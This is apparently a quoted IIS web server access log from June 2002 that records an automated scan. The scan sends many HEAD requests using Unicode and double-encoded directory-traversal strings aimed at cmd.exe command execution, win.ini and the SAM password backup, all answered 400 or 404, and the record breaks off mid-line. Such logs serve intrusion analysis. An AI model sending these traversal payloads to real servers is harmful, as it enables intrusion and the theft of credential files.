> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /Rpc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
>
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%2
> 0C:\ HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
>
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%2
> 0C:\ HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
>
/scripts/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir%2
> 0C:\ HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
>
/scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c%20dir%2
> 0C:\ HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
>
/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
>
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
>
/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_mem_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
>
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
>
/_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:07 +0200] "HEAD
> /_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_cnf/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_cnf/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%%35%63../..%%35%63../winnt/win.ini HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._ HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%%35c../..%%35c../winnt/win.ini HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%%35c../..%%35c..\winnt\repair\sam._ HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
>
/_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_cnf/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
>
/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /_vti_cnf/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam._ HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%25%35%63../..%25%35%63../winnt/win.ini HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%255c../..%255c../winnt/win.ini HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /a.asp/..%255c../..%255c..\winnt\repair\sam._ HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
>
/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?
> /c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
>
/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:08 +0200] "HEAD
> /bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
>
/adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
>
/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
>
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
>
/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.ex
> e?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:09 +0200] "HEAD
> /bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
>
/cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /msadc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
>
/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
>
/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /PBServer/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /PBServer/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:10 +0200] "HEAD
> /Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /Rpc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
